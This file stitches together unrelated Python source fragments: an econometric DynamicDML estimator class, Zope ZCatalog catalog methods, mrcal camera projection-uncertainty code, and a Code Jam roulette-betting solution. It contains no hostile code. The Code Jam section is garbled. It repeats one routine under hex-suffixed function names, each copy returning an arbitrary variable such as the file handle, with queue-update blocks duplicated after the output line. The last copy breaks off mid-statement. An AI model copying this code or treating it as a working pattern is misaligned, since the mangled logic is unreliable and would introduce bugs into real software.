self.model_y = clone(model_y, safe=False)
self.model_t = clone(model_t, safe=False)
super().__init__(discrete_treatment=discrete_treatment,
discrete_instrument=False,
categories=categories,
cv=GroupKFold(cv) if isinstance(cv, int) else cv,
mc_iters=mc_iters,
mc_agg=mc_agg,
random_state=random_state)
def _gen_featurizer(self):
return clone(self.featurizer, safe=False)
def _gen_model_y(self):
if self.model_y == 'auto':
model_y = WeightedLassoCVWrapper(random_state=self.random_state)
else:
model_y = clone(self.model_y, safe=False)
return _FirstStageWrapper(model_y, True, self._gen_featurizer(),
self.linear_first_stages, self.discrete_treatment)
def _gen_model_t(self):
if self.model_t == 'auto':
if self.discrete_treatment:
model_t = LogisticRegressionCV(cv=WeightedStratifiedKFold(random_state=self.random_state),
random_state=self.random_state)
else:
model_t = WeightedLassoCVWrapper(random_state=self.random_state)
else:
model_t = clone(self.model_t, safe=False)
return _FirstStageWrapper(model_t, False, self._gen_featurizer(),
self.linear_first_stages, self.discrete_treatment)
def _gen_model_final(self):
return StatsModelsLinearRegression(fit_intercept=False)
def _gen_ortho_learner_model_nuisance(self, n_periods):
return _DynamicModelNuisance(
model_t=self._gen_model_t(),
model_y=self._gen_model_y(),
n_periods=n_periods)
def _gen_ortho_learner_model_final(self, n_periods):
wrapped_final_model = _DynamicFinalWrapper(
StatsModelsLinearRegression(fit_intercept=False),
fit_cate_intercept=self.fit_cate_intercept,
featurizer=self.featurizer,
use_weight_trick=False)
return _LinearDynamicModelFinal(wrapped_final_model, n_periods=n_periods)
def _prefit(self, Y, T, *args, groups=None, only_final=False, **kwargs):
u_periods = np.unique(np.unique(groups, return_counts=True)[1])
if len(u_periods) > 1:
raise AttributeError(
"Imbalanced panel. Method currently expects only panels with equal number of periods. Pad your data")
self._n_periods = u_periods[0]
# generate an instance of the final model
self._ortho_learner_model_final = self._gen_ortho_learner_model_final(self._n_periods)
if not only_final:
# generate an instance of the nuisance model
self._ortho_learner_model_nuisance = self._gen_ortho_learner_model_nuisance(self._n_periods)
TreatmentExpansionMixin._prefit(self, Y, T, *args, **kwargs)
def _postfit(self, Y, T, *args, **kwargs):
super()._postfit(Y, T, *args, **kwargs)
# Set _d_t to effective number of treatments
self._d_t = (self._n_periods * self._d_t[0], ) if self._d_t else (self._n_periods, )
def _strata(self, Y, T, X=None, W=None, Z=None,
sample_weight=None, sample_var=None, groups=None,
cache_values=False, only_final=False, check_input=True):
# Required for bootstrap inference
return groups
def fit(self, Y, T, *, X=None, W=None, sample_weight=None, sample_var=None, groups,
cache_values=False, inference='auto'):
"""Estimate the counterfactual model from data, i.e. estimates function :math:`\\theta(\\cdot)`.
The input data must contain groups with the same size corresponding to the number
of time periods the treatments were assigned over.
The data should be preferably in panel format, with groups clustered together.
If group members do not appear together, the following is assumed:
* the first instance of a group in the dataset is assumed to correspond to the first period of that group
* the second instance of a group in the dataset is assumed to correspond to the
second period of that group
...etc.
Only the value of the features X at the first period of each unit are used for
heterogeneity. The value of X in subseuqnet periods is used as a time-varying control
but not for heterogeneity.
Parameters
----------
Y: (n, d_y) matrix or vector of length n
Outcomes for each sample (required: n = n_groups * n_periods)
T: (n, d_t) matrix or vector of length n
Treatments for each sample (required: n = n_groups * n_periods)
X: optional(n, d_x) matrix or None (Default=None)
Features for each sample (Required: n = n_groups * n_periods). Only first
period features from each unit are used for heterogeneity, the rest are
used as time-varying controls together with W
W: optional(n, d_w) matrix or None (Default=None)
Controls for each sample (Required: n = n_groups * n_periods)
sample_weight: optional(n,) vector or None (Default=None)
Weights for each samples
sample_var: optional(n,) vector or None (Default=None)
Sample variance for each sample
groups: (n,) vector, required
All rows corresponding to the same group will be kept together during splitting.
If groups is not None, the `cv` argument passed to this class's initializer
must support a 'groups' argument to its split method.
cache_values: bool, default False
Whether to cache inputs and first stage results, which will allow refitting a different final model
inference: string,:class:`.Inference` instance, or None
Method for performing inference. This estimator supports 'bootstrap'
(or an instance of :class:`.BootstrapInference`) and 'auto'
(or an instance of :class:`.LinearModelFinalInference`).
Returns
-------
self: DynamicDML instance
"""
if sample_weight is not None or sample_var is not None:
warn("This CATE estimator does not yet support sample weights and sample variance. "
"These inputs will be ignored during fitting.",
UserWarning)
return | |
queue.append(lowest + can_replicate)
if lowest + can_replicate - 1 not in seen:
seen.add(lowest + can_replicate - 1)
queue.append(lowest + can_replicate - 1)
for exclude in xrange(0, min(remaining_budget, partial) + 1):
cand = get_expected(placed, lowest, exclude
) - exclude - needed_budget
ret = max(ret, cand)
print 'Case #%d: %.10lf' % (cc + 1, ret)
if lowest + can_replicate not in seen:
seen.add(lowest + can_replicate)
queue.append(lowest + can_replicate)
if lowest + can_replicate - 1 not in seen:
seen.add(lowest + can_replicate - 1)
queue.append(lowest + can_replicate - 1)
infile.close()
return ret
def func_cb830edc80524b599c35f414e9d9982c(infile):
cases = int(infile.readline())
for cc in xrange(cases):
budget, bets = map(int, infile.readline().split())
placed = sorted(map(int, infile.readline().split()))
ret = 0.0
queue = [1] + placed + [(p - 1) for p in placed] + [(p + 1) for p in
placed]
queue = sorted(set(queue))
seen = set(queue)
while queue:
lowest = queue.pop()
if lowest == 0:
continue
needed_budget = (37 - len(placed)) * lowest
for p in placed:
needed_budget += max(0, lowest - p)
if budget < needed_budget:
continue
remaining_budget = budget - needed_budget
partial = len([p for p in placed if p <= lowest])
lowest_cnt = 37 - len(placed) + partial
if lowest_cnt == 0:
continue
larger = [p for p in placed if p > lowest]
if larger:
next_larger = min(larger)
can_replicate = min(next_larger - lowest - 1,
remaining_budget / lowest_cnt)
else:
can_replicate = remaining_budget / lowest_cnt
if can_replicate > 0:
if lowest + can_replicate not in seen:
seen.add(lowest + can_replicate)
queue.append(lowest + can_replicate)
if lowest + can_replicate - 1 not in seen:
seen.add(lowest + can_replicate - 1)
queue.append(lowest + can_replicate - 1)
for exclude in xrange(0, min(remaining_budget, partial) + 1):
cand = get_expected(placed, lowest, exclude
) - exclude - needed_budget
ret = max(ret, cand)
print 'Case #%d: %.10lf' % (cc + 1, ret)
if lowest + can_replicate not in seen:
seen.add(lowest + can_replicate)
queue.append(lowest + can_replicate)
if lowest + can_replicate - 1 not in seen:
seen.add(lowest + can_replicate - 1)
queue.append(lowest + can_replicate - 1)
infile.close()
return can_replicate
def func_64c4778be53c42918793d40dbb23da44():
infile = open('codejam/test_files/Y13R5P1/A.in')
cases = int(infile.readline())
for cc in xrange(cases):
budget, bets = map(int, infile.readline().split())
placed = sorted(map(int, infile.readline().split()))
ret = 0.0
queue = [1] + placed + [(p - 1) for p in placed] + [(p + 1) for p in
placed]
queue = sorted(set(queue))
seen = set(queue)
while queue:
lowest = queue.pop()
if lowest == 0:
continue
needed_budget = (37 - len(placed)) * lowest
for p in placed:
needed_budget += max(0, lowest - p)
if budget < needed_budget:
continue
remaining_budget = budget - needed_budget
partial = len([p for p in placed if p <= lowest])
lowest_cnt = 37 - len(placed) + partial
if lowest_cnt == 0:
continue
larger = [p for p in placed if p > lowest]
if larger:
next_larger = min(larger)
can_replicate = min(next_larger - lowest - 1,
remaining_budget / lowest_cnt)
else:
can_replicate = remaining_budget / lowest_cnt
if can_replicate > 0:
if lowest + can_replicate not in seen:
seen.add(lowest + can_replicate)
queue.append(lowest + can_replicate)
if lowest + can_replicate - 1 not in seen:
seen.add(lowest + can_replicate - 1)
queue.append(lowest + can_replicate - 1)
for exclude in xrange(0, min(remaining_budget, partial) + 1):
cand = get_expected(placed, lowest, exclude
) - exclude - needed_budget
ret = max(ret, cand)
print 'Case #%d: %.10lf' % (cc + 1, ret)
if lowest + can_replicate not in seen:
seen.add(lowest + can_replicate)
queue.append(lowest + can_replicate)
if lowest + can_replicate - 1 not in seen:
seen.add(lowest + can_replicate - 1)
queue.append(lowest + can_replicate - 1)
infile.close()
return cases
def func_bd84959af057473b96f9a75fab5485bf():
infile = open('codejam/test_files/Y13R5P1/A.in')
cases = int(infile.readline())
for cc in xrange(cases):
budget, bets = map(int, infile.readline().split())
placed = sorted(map(int, infile.readline().split()))
ret = 0.0
queue = [1] + placed + [(p - 1) for p in placed] + [(p + 1) for p in
placed]
queue = sorted(set(queue))
seen = set(queue)
while queue:
lowest = queue.pop()
if lowest == 0:
continue
needed_budget = (37 - len(placed)) * lowest
for p in placed:
needed_budget += max(0, lowest - p)
if budget < needed_budget:
continue
remaining_budget = budget - needed_budget
partial = len([p for p in placed if p <= lowest])
lowest_cnt = 37 - len(placed) + partial
if lowest_cnt == 0:
continue
larger = [p for p in placed if p > lowest]
if larger:
next_larger = min(larger)
can_replicate = min(next_larger - lowest - 1,
remaining_budget / lowest_cnt)
else:
can_replicate = remaining_budget / lowest_cnt
if can_replicate > 0:
if lowest + can_replicate not in seen:
seen.add(lowest + can_replicate)
queue.append(lowest + can_replicate)
if lowest + can_replicate - 1 not in seen:
seen.add(lowest + can_replicate - 1)
queue.append(lowest + can_replicate - 1)
for exclude in xrange(0, min(remaining_budget, partial) + 1):
cand = get_expected(placed, lowest, exclude
) - exclude - needed_budget
ret = max(ret, cand)
print 'Case #%d: %.10lf' % (cc + 1, ret)
if lowest + can_replicate not in seen:
seen.add(lowest + can_replicate)
queue.append(lowest + can_replicate)
if lowest + can_replicate - 1 not in seen:
seen.add(lowest + can_replicate - 1)
queue.append(lowest + can_replicate - 1)
infile.close()
return next_larger
def func_0df505aef94e4004a95d9ea8c9396a7c():
infile = open('codejam/test_files/Y13R5P1/A.in')
cases = int(infile.readline())
for cc in xrange(cases):
budget, bets = map(int, infile.readline().split())
placed = sorted(map(int, infile.readline().split()))
ret = 0.0
queue = [1] + placed + [(p - 1) for p in placed] + [(p + 1) for p in
placed]
queue = sorted(set(queue))
seen = set(queue)
while queue:
lowest = queue.pop()
if lowest == 0:
continue
needed_budget = (37 - len(placed)) * lowest
for p in placed:
needed_budget += max(0, lowest - p)
if budget < needed_budget:
continue
remaining_budget = budget - needed_budget
partial = len([p for p in placed if p <= lowest])
lowest_cnt = 37 - len(placed) + partial
if lowest_cnt == 0:
continue
larger = [p for p in placed if p > lowest]
if larger:
next_larger = min(larger)
can_replicate = min(next_larger - lowest - 1,
remaining_budget / lowest_cnt)
else:
can_replicate = remaining_budget / lowest_cnt
if can_replicate > 0:
if lowest + can_replicate not in seen:
seen.add(lowest + can_replicate)
queue.append(lowest + can_replicate)
if lowest + can_replicate - 1 not in seen:
seen.add(lowest + can_replicate - 1)
queue.append(lowest + can_replicate - 1)
for exclude in xrange(0, min(remaining_budget, partial) + 1):
cand = get_expected(placed, lowest, exclude
) - exclude - needed_budget
ret = max(ret, cand)
print 'Case #%d: %.10lf' % (cc + 1, ret)
if lowest + can_replicate not in seen:
seen.add(lowest + can_replicate)
queue.append(lowest + can_replicate)
if lowest + can_replicate - 1 not in seen:
seen.add(lowest + can_replicate - 1)
queue.append(lowest + can_replicate - 1)
infile.close()
return infile
def func_4101d7d7b5284fc398b7616684eef88a():
infile = open('codejam/test_files/Y13R5P1/A.in')
cases = int(infile.readline())
for cc in xrange(cases):
budget, bets = map(int, infile.readline().split())
placed = sorted(map(int, infile.readline().split()))
ret = 0.0
queue = [1] + placed + [(p - 1) for p in placed] + [(p + 1) for p in
placed]
queue = sorted(set(queue))
seen = set(queue)
while queue:
lowest = queue.pop()
if lowest == 0:
continue
needed_budget = (37 - len(placed)) * lowest
for p in placed:
needed_budget += max(0, lowest - p)
if budget < needed_budget:
continue
remaining_budget = budget - needed_budget
partial = len([p for p in placed if p <= lowest])
lowest_cnt = 37 - len(placed) + partial
if lowest_cnt == 0:
continue
larger = [p for p in placed if p > lowest]
if larger:
next_larger = min(larger)
can_replicate = min(next_larger - lowest - 1,
remaining_budget / lowest_cnt)
else:
can_replicate = remaining_budget / lowest_cnt
if can_replicate > 0:
if lowest + can_replicate not in seen:
seen.add(lowest + can_replicate)
queue.append(lowest + can_replicate)
if lowest + can_replicate - 1 not in seen:
seen.add(lowest + can_replicate - 1)
queue.append(lowest + can_replicate - 1)
for exclude in xrange(0, min(remaining_budget, partial) + 1):
cand = get_expected(placed, lowest, exclude
) - exclude - needed_budget
ret = max(ret, cand)
print 'Case #%d: %.10lf' % (cc + 1, ret)
if lowest + can_replicate not | |
subtransaction.
t = id(transaction.get())
if t != self._v_transaction:
self._v_total = 0
self._v_transaction = t
self._v_total = self._v_total + 1
# increment the _v_total counter for this thread only and get a
# reference to the current transaction. the _v_total counter is
# zeroed if we notice that we're in a different transaction than
# the last one that came by. The semantics here mean that we
# should GC the cache if our threshhold is exceeded within the
# boundaries of the current transaction.
if self._v_total > self.threshold:
self._p_jar.cacheGC()
self._v_total = 0
return True
return False
@security.protected(manage_zcatalog_entries)
def catalog_object(self, obj, uid=None, idxs=None, update_metadata=1,
pghandler=None):
if uid is None:
try:
uid = obj.getPhysicalPath
except AttributeError:
raise CatalogError(
"A cataloged object must support the 'getPhysicalPath' "
"method if no unique id is provided when cataloging")
else:
uid = '/'.join(uid())
elif not isinstance(uid, str):
raise CatalogError('The object unique id must be a string.')
self._catalog.catalogObject(obj, uid, None, idxs,
update_metadata=update_metadata)
# None passed in to catalogObject as third argument indicates
# that we shouldn't try to commit subtransactions within any
# indexing code. We throw away the result of the call to
# catalogObject (which is a word count), because it's
# worthless to us here.
if self.maintain_zodb_cache():
transaction.savepoint(optimistic=True)
if pghandler:
pghandler.info('committing subtransaction')
@security.protected(manage_zcatalog_entries)
def uncatalog_object(self, uid):
self._catalog.uncatalogObject(uid)
@security.protected(search_zcatalog)
def uniqueValuesFor(self, name):
# Return the unique values for a given FieldIndex
return self._catalog.uniqueValuesFor(name)
@security.protected(search_zcatalog)
def getpath(self, rid):
# Return the path to a cataloged object given a 'data_record_id_'
return self._catalog.paths[rid]
@security.protected(search_zcatalog)
def getrid(self, path, default=None):
# Return 'data_record_id_' the to a cataloged object given a 'path'
return self._catalog.uids.get(path, default)
@security.protected(search_zcatalog)
def getobject(self, rid, REQUEST=None):
# Return a cataloged object given a 'data_record_id_'
return aq_parent(self).unrestrictedTraverse(self.getpath(rid))
@security.protected(search_zcatalog)
def getMetadataForUID(self, uid):
# return the correct metadata given the uid, usually the path
rid = self._catalog.uids[uid]
return self._catalog.getMetadataForRID(rid)
@security.protected(search_zcatalog)
def getIndexDataForUID(self, uid):
# return the current index contents given the uid, usually the path
rid = self._catalog.uids[uid]
return self._catalog.getIndexDataForRID(rid)
@security.protected(search_zcatalog)
def getMetadataForRID(self, rid):
# return the correct metadata for the cataloged record id
return self._catalog.getMetadataForRID(int(rid))
@security.protected(search_zcatalog)
def getIndexDataForRID(self, rid):
# return the current index contents for the specific rid
return self._catalog.getIndexDataForRID(rid)
@security.protected(search_zcatalog)
def getAllBrains(self):
# return a generator of brains for all cataloged objects
for rid in self._catalog.data:
yield self._catalog[rid]
@security.protected(search_zcatalog)
def schema(self):
return self._catalog.schema.keys()
@security.protected(search_zcatalog)
def indexes(self):
return self._catalog.indexes.keys()
@security.protected(search_zcatalog)
def index_objects(self):
# This method returns unwrapped indexes!
# You should probably use getIndexObjects instead
return self._catalog.indexes.values()
@security.protected(manage_zcatalog_indexes)
def getIndexObjects(self):
# Return a list of wrapped(!) indexes
getIndex = self._catalog.getIndex
return [getIndex(name) for name in self.indexes()]
def _searchable_arguments(self):
r = {}
n = {'optional': 1}
for name in self._catalog.indexes.keys():
r[name] = n
return r
def _searchable_result_columns(self):
r = []
for name in self._catalog.schema.keys():
i = {}
i['name'] = name
i['type'] = 's'
i['parser'] = str
i['width'] = 8
r.append(i)
r.append({'name': 'data_record_id_',
'type': 's',
'parser': str,
'width': 8})
return r
@security.protected(search_zcatalog)
def searchResults(self, query=None, **kw):
"""Search the catalog.
Search terms can be passed as a query or as keyword arguments.
"""
return self._catalog.searchResults(query, **kw)
security.declareProtected(search_zcatalog, '__call__')
__call__ = searchResults
@security.protected(search_zcatalog)
def search(self, query,
sort_index=None, reverse=0, limit=None, merge=1):
"""Programmatic search interface, use for searching the catalog from
scripts.
query: Dictionary containing catalog query
sort_index: Name of sort index
reverse: Reverse sort order?
limit: Limit sorted result count (optimization hint)
merge: Return merged results (like searchResults) or raw
results for later merging.
"""
if sort_index is not None:
sort_index = self._catalog.indexes[sort_index]
return self._catalog.search(
query, sort_index, reverse, limit, merge)
@security.protected(search_zcatalog)
def valid_roles(self):
# Return list of valid roles
obj = self
roles = set()
x = 0
while x < 100:
if hasattr(obj, '__ac_roles__'):
for role in obj.__ac_roles__:
roles.add(role)
obj = aq_parent(obj)
if obj is None:
break
x = x + 1
roles = list(roles)
roles.sort()
return roles
@security.protected(manage_zcatalog_entries)
def ZopeFindAndApply(self, obj, obj_ids=None, obj_metatypes=None,
obj_searchterm=None, obj_expr=None,
obj_mtime=None, obj_mspec=None,
obj_permission=None, obj_roles=None,
search_sub=0,
REQUEST=None, result=None, pre='',
apply_func=None, apply_path=''):
"""Zope Find interface and apply
This is a *great* hack. Zope find just doesn't do what we
need here; the ability to apply a method to all the objects
*as they're found* and the need to pass the object's path into
that method.
"""
if result is None:
result = []
if obj_metatypes and 'all' in obj_metatypes:
obj_metatypes = None
if obj_mtime and isinstance(obj_mtime, str):
obj_mtime = DateTime(obj_mtime).timeTime()
if obj_permission:
obj_permission = getPermissionIdentifier(obj_permission)
if obj_roles and isinstance(obj_roles, str):
obj_roles = [obj_roles]
if obj_expr:
# Setup expr machinations
md = td()
obj_expr = (Eval(obj_expr), md, md._push, md._pop)
base = aq_base(obj)
if not hasattr(base, 'objectItems'):
return result
try:
items = obj.objectItems()
except Exception:
return result
try:
add_result = result.append
except Exception:
raise AttributeError(repr(result))
for id, ob in items:
if pre:
p = "%s/%s" % (pre, id)
else:
p = id
dflag = 0
if hasattr(ob, '_p_changed') and (ob._p_changed is None):
dflag = 1
bs = aq_base(ob)
if ((not obj_ids or absattr(bs.id) in obj_ids)
and (not obj_metatypes or (hasattr(bs, 'meta_type')
and bs.meta_type in obj_metatypes))
and (not obj_searchterm
or (hasattr(ob, 'PrincipiaSearchSource')
and ob.PrincipiaSearchSource().find(obj_searchterm) >= 0)) # noqa: E501
and (not obj_expr
or expr_match(ob, obj_expr))
and (not obj_mtime
or mtime_match(ob, obj_mtime, obj_mspec))
and ((not obj_permission
or not obj_roles)
or role_match(ob, obj_permission, obj_roles))):
if apply_func:
apply_func(ob, (apply_path + '/' + p))
else:
add_result((p, ob))
dflag = 0
if search_sub and hasattr(bs, 'objectItems'):
self.ZopeFindAndApply(ob, obj_ids, obj_metatypes,
obj_searchterm, obj_expr,
obj_mtime, obj_mspec,
obj_permission, obj_roles,
search_sub,
REQUEST, result, p,
apply_func, apply_path)
if dflag:
ob._p_deactivate()
return result
@security.protected(search_zcatalog)
def resolve_url(self, path, REQUEST):
# Attempt to resolve a url into an object in the Zope
# namespace. The url may be absolute or a catalog path
# style url. If no object is found, None is returned.
# No exceptions are raised.
if REQUEST:
script = REQUEST.script
if path.find(script) != 0:
path = '%s/%s' % (script, path)
try:
return REQUEST.resolve_url(path)
except Exception:
pass
@security.protected(search_zcatalog)
def resolve_path(self, path):
# Attempt to resolve a url into an object in the Zope
# namespace. The url may be absolute or a catalog path
# style url. If no object is found, None is returned.
# No exceptions are raised.
try:
return self.unrestrictedTraverse(path)
except Exception:
pass
@security.protected(manage_zcatalog_entries)
def manage_normalize_paths(self, REQUEST):
"""Ensure that all catalog paths are full physical paths
This should only be used with ZCatalogs in which all paths can
be resolved with unrestrictedTraverse."""
paths = self._catalog.paths
uids = self._catalog.uids
unchanged = 0
fixed = []
removed = []
for path, rid in uids.items():
ob = None
if path[:1] == '/':
ob = self.resolve_url(path[1:], REQUEST)
if ob is None:
ob = self.resolve_url(path, REQUEST)
if ob is None:
removed.append(path)
continue
ppath = '/'.join(ob.getPhysicalPath())
if path != ppath:
fixed.append((path, ppath))
else:
unchanged = unchanged + 1
for path, ppath in fixed:
rid = uids[path]
del uids[path]
paths[rid] = ppath
uids[ppath] = rid
for path in removed:
self.uncatalog_object(path)
@security.protected(manage_zcatalog_entries)
def manage_setProgress(self, pgthreshold=0, RESPONSE=None, URL1=None):
"""Set parameter to perform logging of reindexing operations very
'pgthreshold' objects
"""
self.pgthreshold = pgthreshold
if RESPONSE:
RESPONSE.redirect(URL1 + '/manage_catalogAdvanced?'
'manage_tabs_message=Catalog%20Changed')
def _getProgressThreshold(self):
if not hasattr(self, 'pgthreshold'):
self.pgthreshold = 0
return self.pgthreshold
# Indexing methods
@security.protected(manage_zcatalog_indexes)
def addIndex(self, name, type, extra=None):
if IPluggableIndex.providedBy(type):
self._catalog.addIndex(name, type)
return
# Convert the type by finding an appropriate product which supports
# this interface by that name. Bleah
products = ObjectManager.all_meta_types(self,
interfaces=(IPluggableIndex, ))
p = None
for prod in products:
if prod['name'] == type:
p = prod
break
if p is None:
raise ValueError("Index of type %s not found" % type)
base = p['instance']
if base is None:
raise ValueError("Index type %s does not support addIndex" % type)
# This code is *really* lame but every index type has its own
# function signature *sigh* and there is no common way to pass
# additional parameters to the constructor. The suggested way
# for new index types is to use an "extra" record.
if 'extra' in base.__init__.__code__.co_varnames:
index = base(name, extra=extra, caller=self)
elif 'caller' | |
else:
# No regularization. Use the simplified expression
Var_dq = nps.matmult(dq_dpief_packed, nps.transpose(A))
if what == 'covariance': return Var_dq * observed_pixel_uncertainty*observed_pixel_uncertainty
if what == 'worstdirection-stdev': return worst_direction_stdev(Var_dq) * observed_pixel_uncertainty
if what == 'rms-stdev': return np.sqrt(nps.trace(Var_dq)/2.) * observed_pixel_uncertainty
else: raise Exception("Shouldn't have gotten here. There's a bug")
def _projection_uncertainty( p_cam,
lensmodel, intrinsics_data,
extrinsics_rt_fromref, frames_rt_toref,
factorization, Jpacked, optimization_inputs,
istate_intrinsics, istate_extrinsics, istate_frames,
slice_optimized_intrinsics,
Nmeasurements_observations,
observed_pixel_uncertainty,
what):
r'''Helper for projection_uncertainty()
See docs for _projection_uncertainty_make_output() and
projection_uncertainty()
This function does all the work when observing points with a finite range
'''
Nstate = Jpacked.shape[-1]
dq_dpief = np.zeros(p_cam.shape[:-1] + (2,Nstate), dtype=float)
if frames_rt_toref is not None:
Nframes = len(frames_rt_toref)
if extrinsics_rt_fromref is not None:
p_ref = \
mrcal.transform_point_rt( mrcal.invert_rt(extrinsics_rt_fromref),
p_cam )
else:
p_ref = p_cam
if frames_rt_toref is not None:
# The point in the coord system of all the frames. I index the frames on
# axis -2
p_frames = mrcal.transform_point_rt( mrcal.invert_rt(frames_rt_toref),
nps.dummy(p_ref,-2) )
# I now have the observed point represented in the coordinate system of the
# frames. This is indendent of any intrinsics-implied rotation, or anything
# of the sort. I project this point back to pixels, through noisy estimates
# of the frames, extrinsics and intrinsics.
#
# I transform each frame-represented point back to the reference coordinate
# system, and I average out each estimate to get the one p_ref I will use. I
# already have p_ref, so I don't actually need to compute the value; I just
# need the gradients
# dprefallframes_dframes has shape (..., Nframes,3,6)
_, \
dprefallframes_dframes, \
_ = mrcal.transform_point_rt( frames_rt_toref, p_frames,
get_gradients = True)
# shape (..., 3,6*Nframes)
# /Nframes because I compute the mean over all the frames
dpref_dframes = nps.clump( nps.mv(dprefallframes_dframes, -3, -2),
n = -2 ) / Nframes
_, dq_dpcam, dq_dintrinsics = \
mrcal.project( p_cam, lensmodel, intrinsics_data,
get_gradients = True)
if istate_intrinsics is not None:
dq_dintrinsics_optimized = dq_dintrinsics[..., slice_optimized_intrinsics]
Nintrinsics = dq_dintrinsics_optimized.shape[-1]
dq_dpief[..., istate_intrinsics:istate_intrinsics+Nintrinsics] = \
dq_dintrinsics_optimized
if extrinsics_rt_fromref is not None:
_, dpcam_drt, dpcam_dpref = \
mrcal.transform_point_rt(extrinsics_rt_fromref, p_ref,
get_gradients = True)
dq_dpief[..., istate_extrinsics:istate_extrinsics+6] = \
nps.matmult(dq_dpcam, dpcam_drt)
if frames_rt_toref is not None:
dq_dpief[..., istate_frames:istate_frames+Nframes*6] = \
nps.matmult(dq_dpcam, dpcam_dpref, dpref_dframes)
else:
if frames_rt_toref is not None:
dq_dpief[..., istate_frames:istate_frames+Nframes*6] = \
nps.matmult(dq_dpcam, dpref_dframes)
# Make dq_dpief use the packed state. I call "unpack_state" because the
# state is in the denominator
mrcal.unpack_state(dq_dpief, **optimization_inputs)
return \
_projection_uncertainty_make_output( factorization, Jpacked,
dq_dpief, Nmeasurements_observations,
observed_pixel_uncertainty,
what)
def _projection_uncertainty_rotationonly( p_cam,
lensmodel, intrinsics_data,
extrinsics_rt_fromref, frames_rt_toref,
factorization, Jpacked, optimization_inputs,
istate_intrinsics, istate_extrinsics, istate_frames,
slice_optimized_intrinsics,
Nmeasurements_observations,
observed_pixel_uncertainty,
what):
r'''Helper for projection_uncertainty()
See docs for _projection_uncertainty_make_output() and
projection_uncertainty()
This function does all the work when observing points at infinity
'''
Nstate = Jpacked.shape[-1]
dq_dpief = np.zeros(p_cam.shape[:-1] + (2,Nstate), dtype=float)
if frames_rt_toref is not None:
Nframes = len(frames_rt_toref)
if extrinsics_rt_fromref is not None:
p_ref = \
mrcal.rotate_point_r( -extrinsics_rt_fromref[..., :3], p_cam )
else:
p_ref = p_cam
if frames_rt_toref is not None:
# The point in the coord system of all the frames. I index the frames on
# axis -2
p_frames = mrcal.rotate_point_r( -frames_rt_toref[...,:3],
nps.dummy(p_ref,-2) )
# I now have the observed point represented in the coordinate system of the
# frames. This is indendent of any intrinsics-implied rotation, or anything
# of the sort. I project this point back to pixels, through noisy estimates
# of the frames, extrinsics and intrinsics.
#
# I transform each frame-represented point back to the reference coordinate
# system, and I average out each estimate to get the one p_ref I will use. I
# already have p_ref, so I don't actually need to compute the value; I just
# need the gradients
# dprefallframes_dframesr has shape (..., Nframes,3,3)
_, \
dprefallframes_dframesr, \
_ = mrcal.rotate_point_r( frames_rt_toref[...,:3], p_frames,
get_gradients = True)
_, dq_dpcam, dq_dintrinsics = \
mrcal.project( p_cam, lensmodel, intrinsics_data,
get_gradients = True)
if istate_intrinsics is not None:
dq_dintrinsics_optimized = dq_dintrinsics[..., slice_optimized_intrinsics]
Nintrinsics = dq_dintrinsics_optimized.shape[-1]
dq_dpief[..., istate_intrinsics:istate_intrinsics+Nintrinsics] = \
dq_dintrinsics_optimized
if extrinsics_rt_fromref is not None:
_, dpcam_dr, dpcam_dpref = \
mrcal.rotate_point_r(extrinsics_rt_fromref[...,:3], p_ref,
get_gradients = True)
dq_dpief[..., istate_extrinsics:istate_extrinsics+3] = \
nps.matmult(dq_dpcam, dpcam_dr)
if frames_rt_toref is not None:
dq_dpref = nps.matmult(dq_dpcam, dpcam_dpref)
# dprefallframes_dframesr has shape (..., Nframes,3,3)
for i in range(Nframes):
dq_dpief[..., istate_frames+6*i:istate_frames+6*i+3] = \
nps.matmult(dq_dpref, dprefallframes_dframesr[...,i,:,:]) / Nframes
else:
if frames_rt_toref is not None:
# dprefallframes_dframesr has shape (..., Nframes,3,3)
for i in range(Nframes):
dq_dpief[..., istate_frames+6*i:istate_frames+6*i+3] = \
nps.matmult(dq_dpcam, dprefallframes_dframesr[...,i,:,:]) / Nframes
# Make dq_dpief use the packed state. I call "unpack_state" because the
# state is in the denominator
mrcal.unpack_state(dq_dpief, **optimization_inputs)
return \
_projection_uncertainty_make_output( factorization, Jpacked,
dq_dpief, Nmeasurements_observations,
observed_pixel_uncertainty,
what)
def projection_uncertainty( p_cam, model,
atinfinity = False,
# what we're reporting
what = 'covariance'):
r'''Compute the projection uncertainty of a camera-referenced point
This is the interface to the uncertainty computations described in
http://mrcal.secretsauce.net/uncertainty.html
SYNOPSIS
model = mrcal.cameramodel("xxx.cameramodel")
q = np.array((123., 443.))
distance = 10.0
pcam = distance * mrcal.unproject(q, *model.intrinsics(), normalize=True)
print(mrcal.projection_uncertainty(pcam,
model = model,
what = 'worstdirection-stdev'))
===> 0.5
# So if we have observed a world point at pixel coordinates q, and we know
# it's 10m out, then we know that the standard deviation of the noise of the
# pixel obsevation is 0.5 pixels, in the worst direction
After a camera model is computed via a calibration process, the model is
ultimately used in projection/unprojection operations to map between world
coordinates and projected pixel coordinates. We never know the parameters of the
model perfectly, and it is VERY useful to know the resulting uncertainty of
projection. This can be used, among other things, to
- propagate the projection noise down to whatever is using the observed pixels
to do stuff
- evaluate the quality of calibrations, to know whether a given calibration
should be accepted, or rejected
- evaluate the stability of a computed model
I quantify uncertainty by propagating expected noise on observed chessboard
corners through the optimization problem we're solving during calibration time
to the solved parameters. And then propagating the noise on the parameters
through projection.
The below derivation is double-checked via simulated noise in
test-projection-uncertainty.py
The uncertainties can be visualized with the mrcal-show-projection-uncertainty
tool.
ARGUMENTS
This function accepts an array of camera-referenced points p_cam and some
representation of parameters and uncertainties (either a single
mrcal.cameramodel object or all of
(lensmodel,intrinsics_data,extrinsics_rt_fromref,frames_rt_toref,Var_ief)). And
a few meta-parameters that describe details of the behavior. This function
broadcasts on p_cam only. We accept
- p_cam: a numpy array of shape (..., 3). This is the set of camera-coordinate
points where we're querying uncertainty. if not atinfinity: then the full 3D
coordinates of p_cam are significant, even distance to the camera. if
atinfinity: the distance to the camera is ignored.
- model: a mrcal.cameramodel object containing the intrinsics, extrinsics, frame
poses and their covariance. If this isn't given, then each of these MUST be
given in a separate argument
- lensmodel: a string describing which lens model we're using. This is something
like 'LENSMODEL_OPENCV4'. This is required if and only if model is None
- intrinsics_data: a numpy array of shape (Nintrinsics,) where Nintrinsics is
the number of parameters in the intrinsics vector for this lens model,
returned by mrcal.lensmodel_num_params(lensmodel). This is required if and only if
model is None
- extrinsics_rt_fromref: a numpy array of shape (6,) or None. This is an rt
transformation from the reference coordinate system to the camera coordinate
system. If None: the camera is at the reference coordinate system. Note that
these are the extrinsics AT CALIBRATION TIME. If we moved the camera after
calibrating, then this is OK, but for the purposes of uncertainty
